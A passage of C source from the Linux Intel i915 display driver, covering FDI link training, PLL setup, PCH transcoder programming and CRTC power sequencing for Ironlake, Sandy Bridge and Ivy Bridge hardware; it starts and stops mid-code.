	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int pipe = intel_crtc->pipe;
	u32 reg, temp, i;

	/* Train 1: umask FDI RX Interrupt symbol_lock and bit_lock bit
	   for train result */
	reg = FDI_RX_IMR(pipe);
	temp = I915_READ(reg);
	temp &= ~FDI_RX_SYMBOL_LOCK;
	temp &= ~FDI_RX_BIT_LOCK;
	I915_WRITE(reg, temp);

	POSTING_READ(reg);
	udelay(150);

	/* enable CPU FDI TX and PCH FDI RX */
	reg = FDI_TX_CTL(pipe);
	temp = I915_READ(reg);
	/* Lane-count field occupies bits 21:19. */
	temp &= ~(7 << 19);
	temp |= (intel_crtc->fdi_lanes - 1) << 19;
	temp &= ~FDI_LINK_TRAIN_NONE;
	temp |= FDI_LINK_TRAIN_PATTERN_1;
	temp &= ~FDI_LINK_TRAIN_VOL_EMP_MASK;
	/* SNB-B */
	temp |= FDI_LINK_TRAIN_400MV_0DB_SNB_B;
	I915_WRITE(reg, temp | FDI_TX_ENABLE);

	reg = FDI_RX_CTL(pipe);
	temp = I915_READ(reg);
	if (HAS_PCH_CPT(dev)) {
		temp &= ~FDI_LINK_TRAIN_PATTERN_MASK_CPT;
		temp |= FDI_LINK_TRAIN_PATTERN_1_CPT;
	} else {
		temp &= ~FDI_LINK_TRAIN_NONE;
		temp |= FDI_LINK_TRAIN_PATTERN_1;
	}
	I915_WRITE(reg, temp | FDI_RX_ENABLE);

	POSTING_READ(reg);
	udelay(150);

	if (HAS_PCH_CPT(dev))
		cpt_phase_pointer_enable(dev, pipe);

	/* Sweep voltage/pre-emphasis settings until bit lock is reported. */
	for (i = 0; i < 4; i++ ) {
		reg = FDI_TX_CTL(pipe);
		temp = I915_READ(reg);
		temp &= ~FDI_LINK_TRAIN_VOL_EMP_MASK;
		temp |= snb_b_fdi_train_param[i];
		I915_WRITE(reg, temp);

		POSTING_READ(reg);
		udelay(500);

		reg = FDI_RX_IIR(pipe);
		temp = I915_READ(reg);
		DRM_DEBUG_KMS("FDI_RX_IIR 0x%x\n", temp);

		if (temp & FDI_RX_BIT_LOCK) {
			/* Writing the bit back acknowledges it. */
			I915_WRITE(reg, temp | FDI_RX_BIT_LOCK);
			DRM_DEBUG_KMS("FDI train 1 done.\n");
			break;
		}
	}
	if (i == 4)
		DRM_ERROR("FDI train 1 fail!\n");

	/* Train 2 */
	reg = FDI_TX_CTL(pipe);
	temp = I915_READ(reg);
	temp &= ~FDI_LINK_TRAIN_NONE;
	temp |= FDI_LINK_TRAIN_PATTERN_2;
	if (IS_GEN6(dev)) {
		temp &= ~FDI_LINK_TRAIN_VOL_EMP_MASK;
		/* SNB-B */
		temp |= FDI_LINK_TRAIN_400MV_0DB_SNB_B;
	}
	I915_WRITE(reg, temp);

	reg = FDI_RX_CTL(pipe);
	temp = I915_READ(reg);
	if (HAS_PCH_CPT(dev)) {
		temp &= ~FDI_LINK_TRAIN_PATTERN_MASK_CPT;
		temp |= FDI_LINK_TRAIN_PATTERN_2_CPT;
	} else {
		temp &= ~FDI_LINK_TRAIN_NONE;
		temp |= FDI_LINK_TRAIN_PATTERN_2;
	}
	I915_WRITE(reg, temp);

	POSTING_READ(reg);
	udelay(150);

	/* Sweep voltage/pre-emphasis settings until symbol lock is reported. */
	for (i = 0; i < 4; i++ ) {
		reg = FDI_TX_CTL(pipe);
		temp = I915_READ(reg);
		temp &= ~FDI_LINK_TRAIN_VOL_EMP_MASK;
		temp |= snb_b_fdi_train_param[i];
		I915_WRITE(reg, temp);

		POSTING_READ(reg);
		udelay(500);

		reg = FDI_RX_IIR(pipe);
		temp = I915_READ(reg);
		DRM_DEBUG_KMS("FDI_RX_IIR 0x%x\n", temp);

		if (temp & FDI_RX_SYMBOL_LOCK) {
			/* Writing the bit back acknowledges it. */
			I915_WRITE(reg, temp | FDI_RX_SYMBOL_LOCK);
			DRM_DEBUG_KMS("FDI train 2 done.\n");
			break;
		}
	}
	if (i == 4)
		DRM_ERROR("FDI train 2 fail!\n");

	DRM_DEBUG_KMS("FDI train done.\n");
}
/* Manual link training for Ivy Bridge A0 parts */
static void ivb_manual_fdi_link_train(struct drm_crtc *crtc)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int pipe = intel_crtc->pipe;
	u32 reg, temp, i;

	/* Train 1: umask FDI RX Interrupt symbol_lock and bit_lock bit
	   for train result */
	reg = FDI_RX_IMR(pipe);
	temp = I915_READ(reg);
	temp &= ~FDI_RX_SYMBOL_LOCK;
	temp &= ~FDI_RX_BIT_LOCK;
	I915_WRITE(reg, temp);

	POSTING_READ(reg);
	udelay(150);

	/* enable CPU FDI TX and PCH FDI RX */
	reg = FDI_TX_CTL(pipe);
	temp = I915_READ(reg);
	temp &= ~(7 << 19);
	temp |= (intel_crtc->fdi_lanes - 1) << 19;
	/* IVB uses its own train-pattern bits (FDI_LINK_TRAIN_*_IVB) and
	 * additionally requires composite sync, unlike ILK/SNB. */
	temp &= ~(FDI_LINK_TRAIN_AUTO | FDI_LINK_TRAIN_NONE_IVB);
	temp |= FDI_LINK_TRAIN_PATTERN_1_IVB;
	temp &= ~FDI_LINK_TRAIN_VOL_EMP_MASK;
	temp |= FDI_LINK_TRAIN_400MV_0DB_SNB_B;
	temp |= FDI_COMPOSITE_SYNC;
	I915_WRITE(reg, temp | FDI_TX_ENABLE);

	reg = FDI_RX_CTL(pipe);
	temp = I915_READ(reg);
	temp &= ~FDI_LINK_TRAIN_AUTO;
	temp &= ~FDI_LINK_TRAIN_PATTERN_MASK_CPT;
	temp |= FDI_LINK_TRAIN_PATTERN_1_CPT;
	temp |= FDI_COMPOSITE_SYNC;
	I915_WRITE(reg, temp | FDI_RX_ENABLE);

	POSTING_READ(reg);
	udelay(150);

	if (HAS_PCH_CPT(dev))
		cpt_phase_pointer_enable(dev, pipe);

	/* Sweep the SNB-B voltage/emphasis table until the RX reports
	 * bit lock; at most four attempts. */
	for (i = 0; i < 4; i++ ) {
		reg = FDI_TX_CTL(pipe);
		temp = I915_READ(reg);
		temp &= ~FDI_LINK_TRAIN_VOL_EMP_MASK;
		temp |= snb_b_fdi_train_param[i];
		I915_WRITE(reg, temp);

		POSTING_READ(reg);
		udelay(500);

		reg = FDI_RX_IIR(pipe);
		temp = I915_READ(reg);
		DRM_DEBUG_KMS("FDI_RX_IIR 0x%x\n", temp);

		/* Re-read the IIR in case bit lock landed just after the
		 * first read; write the bit back to ack it. */
		if (temp & FDI_RX_BIT_LOCK ||
		    (I915_READ(reg) & FDI_RX_BIT_LOCK)) {
			I915_WRITE(reg, temp | FDI_RX_BIT_LOCK);
			DRM_DEBUG_KMS("FDI train 1 done.\n");
			break;
		}
	}
	if (i == 4)
		DRM_ERROR("FDI train 1 fail!\n");

	/* Train 2 */
	reg = FDI_TX_CTL(pipe);
	temp = I915_READ(reg);
	temp &= ~FDI_LINK_TRAIN_NONE_IVB;
	temp |= FDI_LINK_TRAIN_PATTERN_2_IVB;
	temp &= ~FDI_LINK_TRAIN_VOL_EMP_MASK;
	temp |= FDI_LINK_TRAIN_400MV_0DB_SNB_B;
	I915_WRITE(reg, temp);

	reg = FDI_RX_CTL(pipe);
	temp = I915_READ(reg);
	temp &= ~FDI_LINK_TRAIN_PATTERN_MASK_CPT;
	temp |= FDI_LINK_TRAIN_PATTERN_2_CPT;
	I915_WRITE(reg, temp);

	POSTING_READ(reg);
	udelay(150);

	/* Same voltage sweep for pattern 2, waiting for symbol lock. */
	for (i = 0; i < 4; i++ ) {
		reg = FDI_TX_CTL(pipe);
		temp = I915_READ(reg);
		temp &= ~FDI_LINK_TRAIN_VOL_EMP_MASK;
		temp |= snb_b_fdi_train_param[i];
		I915_WRITE(reg, temp);

		POSTING_READ(reg);
		udelay(500);

		reg = FDI_RX_IIR(pipe);
		temp = I915_READ(reg);
		DRM_DEBUG_KMS("FDI_RX_IIR 0x%x\n", temp);

		if (temp & FDI_RX_SYMBOL_LOCK) {
			I915_WRITE(reg, temp | FDI_RX_SYMBOL_LOCK);
			DRM_DEBUG_KMS("FDI train 2 done.\n");
			break;
		}
	}
	if (i == 4)
		DRM_ERROR("FDI train 2 fail!\n");

	DRM_DEBUG_KMS("FDI train done.\n");
}
/* Enable the FDI RX and TX PLLs for @crtc's pipe, switching the RX side
 * from Rawclk to PCDclk once the PLL has warmed up. Must run before FDI
 * link training. */
static void ironlake_fdi_pll_enable(struct drm_crtc *crtc)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int pipe = intel_crtc->pipe;
	u32 reg, temp;

	/* Write the TU size bits so error detection works */
	I915_WRITE(FDI_RX_TUSIZE1(pipe),
		   I915_READ(PIPE_DATA_M1(pipe)) & TU_SIZE_MASK);

	/* enable PCH FDI RX PLL, wait warmup plus DMI latency */
	reg = FDI_RX_CTL(pipe);
	temp = I915_READ(reg);
	/* program lane count (bits 19+) and mirror the pipe's BPC into
	 * the FDI RX BPC field (bits 16+) */
	temp &= ~((0x7 << 19) | (0x7 << 16));
	temp |= (intel_crtc->fdi_lanes - 1) << 19;
	temp |= (I915_READ(PIPECONF(pipe)) & PIPE_BPC_MASK) << 11;
	I915_WRITE(reg, temp | FDI_RX_PLL_ENABLE);

	POSTING_READ(reg);
	udelay(200);

	/* Switch from Rawclk to PCDclk */
	temp = I915_READ(reg);
	I915_WRITE(reg, temp | FDI_PCDCLK);

	POSTING_READ(reg);
	udelay(200);

	/* Enable CPU FDI TX PLL, always on for Ironlake */
	reg = FDI_TX_CTL(pipe);
	temp = I915_READ(reg);
	if ((temp & FDI_TX_PLL_ENABLE) == 0) {
		I915_WRITE(reg, temp | FDI_TX_PLL_ENABLE);

		POSTING_READ(reg);
		udelay(100);
	}
}
/* Disable the CPT FDI auto phase-sync pointer for @pipe. The two writes
 * are deliberate: the first clears the enable bit, the second clears the
 * override bit to lock the setting. */
static void cpt_phase_pointer_disable(struct drm_device *dev, int pipe)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	u32 flags = I915_READ(SOUTH_CHICKEN1);

	flags &= ~(FDI_PHASE_SYNC_EN(pipe));
	I915_WRITE(SOUTH_CHICKEN1, flags); /* once to disable... */
	flags &= ~(FDI_PHASE_SYNC_OVR(pipe));
	I915_WRITE(SOUTH_CHICKEN1, flags); /* then again to lock */
	POSTING_READ(SOUTH_CHICKEN1);
}
/* Tear down the CPU->PCH FDI link for @crtc: disable TX and RX, apply
 * the Ironlake clock-pointer workaround, and leave both sides in train
 * pattern 1 so the next enable starts from a known state. */
static void ironlake_fdi_disable(struct drm_crtc *crtc)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int pipe = intel_crtc->pipe;
	u32 reg, temp;

	/* disable CPU FDI tx and PCH FDI rx */
	reg = FDI_TX_CTL(pipe);
	temp = I915_READ(reg);
	I915_WRITE(reg, temp & ~FDI_TX_ENABLE);
	POSTING_READ(reg);

	reg = FDI_RX_CTL(pipe);
	temp = I915_READ(reg);
	temp &= ~(0x7 << 16);
	temp |= (I915_READ(PIPECONF(pipe)) & PIPE_BPC_MASK) << 11;
	I915_WRITE(reg, temp & ~FDI_RX_ENABLE);

	POSTING_READ(reg);
	udelay(100);

	/* Ironlake workaround, disable clock pointer after downing FDI */
	if (HAS_PCH_IBX(dev)) {
		I915_WRITE(FDI_RX_CHICKEN(pipe), FDI_RX_PHASE_SYNC_POINTER_OVR);
		/* Bug fix: the old code had a misplaced closing paren,
		 * computing I915_READ(FDI_RX_CHICKEN(pipe) & ~bit) -- i.e.
		 * masking the register OFFSET -- so the phase-sync pointer
		 * enable bit was never actually cleared. Mask the read-back
		 * VALUE instead. */
		I915_WRITE(FDI_RX_CHICKEN(pipe),
			   I915_READ(FDI_RX_CHICKEN(pipe)) &
			   ~FDI_RX_PHASE_SYNC_POINTER_EN);
	} else if (HAS_PCH_CPT(dev)) {
		cpt_phase_pointer_disable(dev, pipe);
	}

	/* still set train pattern 1 */
	reg = FDI_TX_CTL(pipe);
	temp = I915_READ(reg);
	temp &= ~FDI_LINK_TRAIN_NONE;
	temp |= FDI_LINK_TRAIN_PATTERN_1;
	I915_WRITE(reg, temp);

	reg = FDI_RX_CTL(pipe);
	temp = I915_READ(reg);
	if (HAS_PCH_CPT(dev)) {
		temp &= ~FDI_LINK_TRAIN_PATTERN_MASK_CPT;
		temp |= FDI_LINK_TRAIN_PATTERN_1_CPT;
	} else {
		temp &= ~FDI_LINK_TRAIN_NONE;
		temp |= FDI_LINK_TRAIN_PATTERN_1;
	}
	/* BPC in FDI rx is consistent with that in PIPECONF */
	temp &= ~(0x07 << 16);
	temp |= (I915_READ(PIPECONF(pipe)) & PIPE_BPC_MASK) << 11;
	I915_WRITE(reg, temp);

	POSTING_READ(reg);
	udelay(100);
}
/*
 * When we disable a pipe, we need to clear any pending scanline wait events
 * to avoid hanging the ring, which we assume we are waiting on.
 */
static void intel_clear_scanline_wait(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_ring_buffer *ring;
	u32 tmp;

	if (IS_GEN2(dev))
		/* Can't break the hang on i8xx */
		return;

	ring = LP_RING(dev_priv);
	tmp = I915_READ_CTL(ring);
	/* Rewriting the control register with the wait bit still set kicks
	 * the ring out of its MI_WAIT_FOR_EVENT stall. */
	if (tmp & RING_WAIT)
		I915_WRITE_CTL(ring, tmp);
}
/* Block until all queued page flips on @crtc's current framebuffer have
 * completed (pending_flip refcount reaches zero). No-op without an fb. */
static void intel_crtc_wait_for_pending_flips(struct drm_crtc *crtc)
{
	struct drm_i915_gem_object *obj;
	struct drm_i915_private *dev_priv;

	if (crtc->fb == NULL)
		return;

	obj = to_intel_framebuffer(crtc->fb)->obj;
	dev_priv = crtc->dev->dev_private;
	wait_event(dev_priv->pending_flip_queue,
		   atomic_read(&obj->pending_flip) == 0);
}
/* Report whether @crtc drives any PCH-side output. Returns false only
 * when a non-PCH eDP encoder (i.e. DP_A on the CPU) is attached, since
 * that output bypasses the PCH entirely. */
static bool intel_crtc_driving_pch(struct drm_crtc *crtc)
{
	struct drm_device *dev = crtc->dev;
	struct drm_mode_config *mode_config = &dev->mode_config;
	struct intel_encoder *intel_encoder;

	/*
	 * If there's a non-PCH eDP on this crtc, it must be DP_A, and that
	 * must be driven by its own crtc; no sharing is possible.
	 */
	list_for_each_entry(intel_encoder, &mode_config->encoder_list,
			    base.head) {
		if (intel_encoder->base.crtc != crtc)
			continue;

		if (intel_encoder->type == INTEL_OUTPUT_EDP &&
		    !intel_encoder_is_pch_edp(&intel_encoder->base))
			return false;
	}

	return true;
}
/*
 * Enable PCH resources required for PCH ports:
 *   - PCH PLLs
 *   - FDI training & RX/TX
 *   - update transcoder timings
 *   - DP transcoding bits
 *   - transcoder
 */
static void ironlake_pch_enable(struct drm_crtc *crtc)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int pipe = intel_crtc->pipe;
	u32 reg, temp;

	/* For PCH output, training FDI link */
	dev_priv->display.fdi_link_train(crtc);

	intel_enable_pch_pll(dev_priv, pipe);

	if (HAS_PCH_CPT(dev)) {
		/* Be sure PCH DPLL SEL is set */
		temp = I915_READ(PCH_DPLL_SEL);
		if (pipe == 0 && (temp & TRANSA_DPLL_ENABLE) == 0)
			temp |= (TRANSA_DPLL_ENABLE | TRANSA_DPLLA_SEL);
		else if (pipe == 1 && (temp & TRANSB_DPLL_ENABLE) == 0)
			temp |= (TRANSB_DPLL_ENABLE | TRANSB_DPLLB_SEL);
		I915_WRITE(PCH_DPLL_SEL, temp);
	}

	/* set transcoder timing, panel must allow it */
	assert_panel_unlocked(dev_priv, pipe);
	/* Copy the CPU pipe's timings verbatim into the PCH transcoder. */
	I915_WRITE(TRANS_HTOTAL(pipe), I915_READ(HTOTAL(pipe)));
	I915_WRITE(TRANS_HBLANK(pipe), I915_READ(HBLANK(pipe)));
	I915_WRITE(TRANS_HSYNC(pipe),  I915_READ(HSYNC(pipe)));
	I915_WRITE(TRANS_VTOTAL(pipe), I915_READ(VTOTAL(pipe)));
	I915_WRITE(TRANS_VBLANK(pipe), I915_READ(VBLANK(pipe)));
	I915_WRITE(TRANS_VSYNC(pipe),  I915_READ(VSYNC(pipe)));

	/* Drop out of training patterns into normal link operation. */
	intel_fdi_normal_train(crtc);

	/* For PCH DP, enable TRANS_DP_CTL */
	if (HAS_PCH_CPT(dev) &&
	    intel_pipe_has_type(crtc, INTEL_OUTPUT_DISPLAYPORT)) {
		u32 bpc = (I915_READ(PIPECONF(pipe)) & PIPE_BPC_MASK) >> 5;
		reg = TRANS_DP_CTL(pipe);
		temp = I915_READ(reg);
		temp &= ~(TRANS_DP_PORT_SEL_MASK |
			  TRANS_DP_SYNC_MASK |
			  TRANS_DP_BPC_MASK);
		temp |= (TRANS_DP_OUTPUT_ENABLE |
			 TRANS_DP_ENH_FRAMING);
		temp |= bpc << 9; /* same format but at 11:9 */

		if (crtc->mode.flags & DRM_MODE_FLAG_PHSYNC)
			temp |= TRANS_DP_HSYNC_ACTIVE_HIGH;
		if (crtc->mode.flags & DRM_MODE_FLAG_PVSYNC)
			temp |= TRANS_DP_VSYNC_ACTIVE_HIGH;

		/* Route the transcoder to whichever PCH DP port drives it. */
		switch (intel_trans_dp_port_sel(crtc)) {
		case PCH_DP_B:
			temp |= TRANS_DP_PORT_SEL_B;
			break;
		case PCH_DP_C:
			temp |= TRANS_DP_PORT_SEL_C;
			break;
		case PCH_DP_D:
			temp |= TRANS_DP_PORT_SEL_D;
			break;
		default:
			DRM_DEBUG_KMS("Wrong PCH DP port return. Guess port B\n");
			temp |= TRANS_DP_PORT_SEL_B;
			break;
		}

		I915_WRITE(reg, temp);
	}

	intel_enable_transcoder(dev_priv, pipe);
}
/* Full power-up sequence for an Ironlake-class crtc: watermarks, LVDS
 * port, FDI (only when a PCH port is driven), panel fitter, LUT, pipe,
 * plane, then the PCH side. Idempotent via intel_crtc->active. */
static void ironlake_crtc_enable(struct drm_crtc *crtc)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int pipe = intel_crtc->pipe;
	int plane = intel_crtc->plane;
	u32 temp;
	bool is_pch_port;

	if (intel_crtc->active)
		return;

	intel_crtc->active = true;
	intel_update_watermarks(dev);

	if (intel_pipe_has_type(crtc, INTEL_OUTPUT_LVDS)) {
		temp = I915_READ(PCH_LVDS);
		if ((temp & LVDS_PORT_EN) == 0)
			I915_WRITE(PCH_LVDS, temp | LVDS_PORT_EN);
	}

	is_pch_port = intel_crtc_driving_pch(crtc);

	if (is_pch_port)
		ironlake_fdi_pll_enable(crtc);
	else
		ironlake_fdi_disable(crtc);

	/* Enable panel fitting for LVDS */
	if (dev_priv->pch_pf_size &&
	    (intel_pipe_has_type(crtc, INTEL_OUTPUT_LVDS) || HAS_eDP)) {
		/* Force use of hard-coded filter coefficients
		 * as some pre-programmed values are broken,
		 * e.g. x201.
		 */
		I915_WRITE(PF_CTL(pipe), PF_ENABLE | PF_FILTER_MED_3x3);
		I915_WRITE(PF_WIN_POS(pipe), dev_priv->pch_pf_pos);
		I915_WRITE(PF_WIN_SZ(pipe), dev_priv->pch_pf_size);
	}

	/*
	 * On ILK+ LUT must be loaded before the pipe is running but with
	 * clocks enabled
	 */
	intel_crtc_load_lut(crtc);

	intel_enable_pipe(dev_priv, pipe, is_pch_port);
	intel_enable_plane(dev_priv, plane, pipe);

	if (is_pch_port)
		ironlake_pch_enable(crtc);

	mutex_lock(&dev->struct_mutex);
	intel_update_fbc(dev);
	mutex_unlock(&dev->struct_mutex);

	intel_crtc_update_cursor(crtc, true);
}
/* Full power-down sequence for an Ironlake-class crtc, the reverse of
 * ironlake_crtc_enable(): cursor/plane/pipe first, then the panel
 * fitter, FDI, PCH ports, transcoder, and finally the PLLs and FDI
 * clocks. Idempotent via intel_crtc->active. */
static void ironlake_crtc_disable(struct drm_crtc *crtc)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int pipe = intel_crtc->pipe;
	int plane = intel_crtc->plane;
	u32 reg, temp;

	if (!intel_crtc->active)
		return;

	/* Let any outstanding flips retire before the plane goes away. */
	intel_crtc_wait_for_pending_flips(crtc);
	drm_vblank_off(dev, pipe);
	intel_crtc_update_cursor(crtc, false);

	intel_disable_plane(dev_priv, plane, pipe);

	if (dev_priv->cfb_plane == plane)
		intel_disable_fbc(dev);

	intel_disable_pipe(dev_priv, pipe);

	/* Disable PF */
	I915_WRITE(PF_CTL(pipe), 0);
	I915_WRITE(PF_WIN_SZ(pipe), 0);

	ironlake_fdi_disable(crtc);

	/* This is a horrible layering violation; we should be doing this in
	 * the connector/encoder ->prepare instead, but we don't always have
	 * enough information there about the config to know whether it will
	 * actually be necessary or just cause undesired flicker.
	 */
	intel_disable_pch_ports(dev_priv, pipe);

	intel_disable_transcoder(dev_priv, pipe);

	if (HAS_PCH_CPT(dev)) {
		/* disable TRANS_DP_CTL */
		reg = TRANS_DP_CTL(pipe);
		temp = I915_READ(reg);
		temp &= ~(TRANS_DP_OUTPUT_ENABLE | TRANS_DP_PORT_SEL_MASK);
		temp |= TRANS_DP_PORT_SEL_NONE;
		I915_WRITE(reg, temp);

		/* disable DPLL_SEL */
		temp = I915_READ(PCH_DPLL_SEL);
		switch (pipe) {
		case 0:
			temp &= ~(TRANSA_DPLL_ENABLE | TRANSA_DPLLA_SEL);
			break;
		case 1:
			temp &= ~(TRANSB_DPLL_ENABLE | TRANSB_DPLLB_SEL);
			break;
		case 2:
			/* FIXME: manage transcoder PLLs? */
			temp &= ~(TRANSC_DPLL_ENABLE | TRANSC_DPLLB_SEL);
			break;
		default:
			BUG(); /* wtf */
		}
		I915_WRITE(PCH_DPLL_SEL, temp);
	}

	/* disable PCH DPLL */
	intel_disable_pch_pll(dev_priv, pipe);

	/* Switch from PCDclk to Rawclk */
	reg = FDI_RX_CTL(pipe);
	temp = I915_READ(reg);
	I915_WRITE(reg, temp & ~FDI_PCDCLK);

	/* Disable CPU FDI TX PLL */
	reg = FDI_TX_CTL(pipe);
	temp = I915_READ(reg);
	I915_WRITE(reg, temp & ~FDI_TX_PLL_ENABLE);

	POSTING_READ(reg);
	udelay(100);

	reg = FDI_RX_CTL(pipe);
	temp = I915_READ(reg);
	I915_WRITE(reg, temp & ~FDI_RX_PLL_ENABLE);

	/* Wait for the clocks to turn off. */
	POSTING_READ(reg);
	udelay(100);

	intel_crtc->active = false;
	intel_update_watermarks(dev);

	mutex_lock(&dev->struct_mutex);
	intel_update_fbc(dev);
	intel_clear_scanline_wait(dev);
	mutex_unlock(&dev->struct_mutex);
}
/* DPMS entry point for Ironlake-class crtcs: any of the "on" flavours
 * (ON/STANDBY/SUSPEND) powers the crtc up; OFF powers it down. */
static void ironlake_crtc_dpms(struct drm_crtc *crtc, int mode)
{
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int pipe = intel_crtc->pipe;
	int plane = intel_crtc->plane;

	/* XXX: When our outputs are all unaware of DPMS modes other than off
	 * and on, we should map those modes to DRM_MODE_DPMS_OFF in the CRTC.
	 */
	if (mode == DRM_MODE_DPMS_OFF) {
		DRM_DEBUG_KMS("crtc %d/%d dpms off\n", pipe, plane);
		ironlake_crtc_disable(crtc);
	} else if (mode == DRM_MODE_DPMS_ON ||
		   mode == DRM_MODE_DPMS_STANDBY ||
		   mode == DRM_MODE_DPMS_SUSPEND) {
		DRM_DEBUG_KMS("crtc %d/%d dpms on\n", pipe, plane);
		ironlake_crtc_enable(crtc);
	}
}
/* Force the video overlay off when its crtc is being disabled. Enabling
 * is intentionally not done here: userspace re-enables the overlay
 * itself, since it has to recompute its position anyway. */
static void intel_crtc_dpms_overlay(struct intel_crtc *intel_crtc, bool enable)
{
	struct drm_device *dev;
	struct drm_i915_private *dev_priv;

	if (enable || !intel_crtc->overlay)
		return;

	dev = intel_crtc->base.dev;
	dev_priv = dev->dev_private;

	mutex_lock(&dev->struct_mutex);
	/* Run the switch-off non-interruptibly so it cannot fail halfway. */
	dev_priv->mm.interruptible = false;
	(void) intel_overlay_switch_off(intel_crtc->overlay);
	dev_priv->mm.interruptible = true;
	mutex_unlock(&dev->struct_mutex);
}
/* Power-up sequence for pre-Ironlake crtcs: PLL, pipe, plane, LUT, FBC,
 * overlay and cursor. Idempotent via intel_crtc->active. */
static void i9xx_crtc_enable(struct drm_crtc *crtc)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int pipe = intel_crtc->pipe;
	int plane = intel_crtc->plane;

	if (intel_crtc->active)
		return;

	intel_crtc->active = true;
	intel_update_watermarks(dev);

	intel_enable_pll(dev_priv, pipe);
	intel_enable_pipe(dev_priv, pipe, false);
	intel_enable_plane(dev_priv, plane, pipe);

	intel_crtc_load_lut(crtc);
	intel_update_fbc(dev);

	/* Give the overlay scaler a chance to enable if it's on this pipe */
	intel_crtc_dpms_overlay(intel_crtc, true);
	intel_crtc_update_cursor(crtc, true);
}
/* Power-down sequence for pre-Ironlake crtcs, the reverse of
 * i9xx_crtc_enable(). Idempotent via intel_crtc->active. */
static void i9xx_crtc_disable(struct drm_crtc *crtc)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int pipe = intel_crtc->pipe;
	int plane = intel_crtc->plane;

	if (!intel_crtc->active)
		return;

	/* Give the overlay scaler a chance to disable if it's on this pipe */
	intel_crtc_wait_for_pending_flips(crtc);
	drm_vblank_off(dev, pipe);
	intel_crtc_dpms_overlay(intel_crtc, false);
	intel_crtc_update_cursor(crtc, false);

	if (dev_priv->cfb_plane == plane)
		intel_disable_fbc(dev);

	intel_disable_plane(dev_priv, plane, pipe);
	intel_disable_pipe(dev_priv, pipe);
	intel_disable_pll(dev_priv, pipe);

	intel_crtc->active = false;
	intel_update_fbc(dev);
	intel_update_watermarks(dev);
	intel_clear_scanline_wait(dev);
}
/* DPMS entry point for pre-Ironlake crtcs: ON/STANDBY/SUSPEND all map
 * to a power-up, OFF maps to a power-down. */
static void i9xx_crtc_dpms(struct drm_crtc *crtc, int mode)
{
	/* XXX: When our outputs are all unaware of DPMS modes other than off
	 * and on, we should map those modes to DRM_MODE_DPMS_OFF in the CRTC.
	 */
	if (mode == DRM_MODE_DPMS_OFF)
		i9xx_crtc_disable(crtc);
	else if (mode == DRM_MODE_DPMS_ON ||
		 mode == DRM_MODE_DPMS_STANDBY ||
		 mode == DRM_MODE_DPMS_SUSPEND)
		i9xx_crtc_enable(crtc);
}
/**
 * Sets the power management mode of the pipe and plane.
 *
 * Dispatches to the platform-specific dpms hook, then mirrors the new
 * pipe dimensions into the legacy SAREA for DRI1 clients (only pipes
 * A and B have SAREA slots).
 */
static void intel_crtc_dpms(struct drm_crtc *crtc, int mode)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct drm_i915_master_private *master_priv;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int pipe = intel_crtc->pipe;
	bool enabled;

	/* Avoid redundant hardware transitions. */
	if (intel_crtc->dpms_mode == mode)
		return;

	intel_crtc->dpms_mode = mode;

	dev_priv->display.dpms(crtc, mode);

	/* The rest only applies when a DRI1 master with a SAREA exists. */
	if (!dev->primary->master)
		return;

	master_priv = dev->primary->master->driver_priv;
	if (!master_priv->sarea_priv)
		return;

	enabled = crtc->enabled && mode != DRM_MODE_DPMS_OFF;

	switch (pipe) {
	case 0:
		master_priv->sarea_priv->pipeA_w = enabled ? crtc->mode.hdisplay : 0;
		master_priv->sarea_priv->pipeA_h = enabled ? crtc->mode.vdisplay : 0;
		break;
	case 1:
		master_priv->sarea_priv->pipeB_w = enabled ? crtc->mode.hdisplay : 0;
		master_priv->sarea_priv->pipeB_h = enabled ? crtc->mode.vdisplay : 0;
		break;
	default:
		DRM_ERROR("Can't update pipe %c in SAREA\n", pipe_name(pipe));
		break;
	}
}
/* Fully disable @crtc via its dpms helper and unpin the framebuffer
 * object that was pinned for scanout. */
static void intel_crtc_disable(struct drm_crtc *crtc)
{
	struct drm_crtc_helper_funcs *crtc_funcs = crtc->helper_private;
	struct drm_device *dev = crtc->dev;

	crtc_funcs->dpms(crtc, DRM_MODE_DPMS_OFF);

	if (crtc->fb) {
		mutex_lock(&dev->struct_mutex);
		i915_gem_object_unpin(to_intel_framebuffer(crtc->fb)->obj);
		mutex_unlock(&dev->struct_mutex);
	}
}
/* Prepare for a mode set.
 *
 * Note we could be a lot smarter here.  We need to figure out which outputs
 * will be enabled, which disabled (in short, how the config will changes)
 * and perform the minimum necessary steps to accomplish that, e.g. updating
 * watermarks, FBC configuration, making sure PLLs are programmed correctly,
 * panel fitting is in the proper state, etc.
 */
static void i9xx_crtc_prepare(struct drm_crtc *crtc)
{
	/* Simplest safe preparation: turn the crtc fully off. */
	i9xx_crtc_disable(crtc);
}
/* Commit hook: re-enable the crtc after a mode set. */
static void i9xx_crtc_commit(struct drm_crtc *crtc)
{
	i9xx_crtc_enable(crtc);
}
/* Prepare hook for Ironlake-class crtcs: turn the crtc fully off before
